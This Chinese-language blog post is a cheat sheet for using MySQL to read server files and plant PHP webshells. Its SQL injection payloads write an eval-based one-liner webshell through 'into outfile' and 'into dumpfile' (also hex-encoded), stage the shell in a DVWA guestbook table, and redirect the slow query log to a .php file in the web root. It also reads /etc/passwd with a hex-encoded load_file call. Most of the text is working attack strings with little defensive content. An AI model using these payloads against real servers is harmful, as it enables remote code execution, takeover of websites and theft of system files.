mysql读文件_写shell总结

本文主要是介绍mysql读文件_写shell总结，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

1.导出函数写shell

触发条件

• 网站绝对路径
• secure_file_priv 的值非NULL或包含了导出的绝对路径
• mysql服务有对网站可访问路径的写权限
• .mysql连接用户有FILE权限/ROOT用户或ROOT权限

可以使用如下语句

show global variables like '%secure%';
#查询secure_file_priv的值，
secure_file_priv的值在mysql配置文件my.ini中设置，这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL，即默认禁止导入导出
Mysql<5.5.53 默认为空，即默认无限制

secure_file_priv值为NULL = 禁止导入导出

使用函数

outfile 和 dumpfile

• outfile

  #实例
  select '<?php phpinfo(); ?>' into outfile "C:\\\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
  

• dumpfile

  #实例
  select '<?php phpinfo(); ?>' into dumpfile "C:\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
  

注意：

两者路径都不可用hex进制来表示
两个函数导出的格式有不同：outfile多行，dumpfile只能导出单行。写shell是注意格式

实践

1.一句话 outfile 直接写

#直接写
-1' union select 1,"<?php @eval($_POST['c']);?>" into outfile "C:/phpStudy/WWW/shell.php"#
#shell HEX编码
id=-1' union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E into outfile "C:/phpStudy/WWW/shell.php"#

2.一句话 插入数据库再outfile

#写入数据
id=-1';insert into dvwa.guestbook values (2,"<?php @eval($_POST['c']);?>","shell") ;#
#读到shell.php
id=-1' union select comment,name from dvwa.guestbook into outfile 'C:/phpStudy/WWW/shell.php';#

select …… into outfile

使用命令 select 'a\naa\raaaa' into outfile '/tmp/test.txt' 来看一下在常用的写文件场景下的结果

可以看到outfile对导出内容中的\n等特殊字符进行了转义，并且在文件内容的末尾增加了一个新行

接着使用命令 select 'a\naa\raaaa' into dumpfile '/tmp/test.txt' 来看一下

可以看到dumpfile对文件内容是原意写入，未做任何转移和增加。这也就是为什么 在平常的UDF提权中使用dumpfile进行dll文件 写入的原因

2.用日志写shell

触发条件

• 网站可访问路径的绝对路径
• mysql服务有对网站可访问路径的写权限
• mysql连接用户有权限开启日志记录和更换日志路径/ROOT权限

mysql日志详解：https://blog.csdn.net/maguang_it/article/details/79922339

只有查询日志和慢查询日志可利用，演示用的是慢查询日志，

慢查询日志
慢查询日志是用来记录执行时间超过指定时间的查询语句。

#查询慢查询是否开启
SHOW GLOBAL VARIABLES LIKE '%query_log%';
#开启慢查询
set global slow_query_log = 1;
#更改日志路径，这里的日志路径可以hex编码
set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';

OFF 表示关闭，log_file表示日志存放目录

完成时间大于10s的sql语句会被记录进慢查询日志，如：select * from users where sleep(11);

实践

1.开启慢查询日志并修改日志为网站路径下的脚本

-1';set global slow_query_log = 1;set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';#

2.执行包含Shell的查询语句并使用sleep(11)让语句记录进慢查询日志脚本

-1';select "<?php eval($_POST[log]);?>" from users where sleep(11);#

3.load_file读文件

触发条件

• 所读文件的绝对路径
• secure_file_priv 的值非NULL或包含了所读文件的绝对路径
• mysql服务有对所读文件的读权限
• mysql连接用户有FILE权限/ROOT用户或ROOT权限

使用函数load_file()

select load_file('绝对路径');

与outfile/dumpfile不同的是，load_file的路径可被hex编码

select load_file(0x2F6574632F706173737764);

参考

https://www.cnblogs.com/zztac/p/11371149.html

https://www.freebuf.com/articles/web/244103.html

这篇关于mysql读文件_写shell总结的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！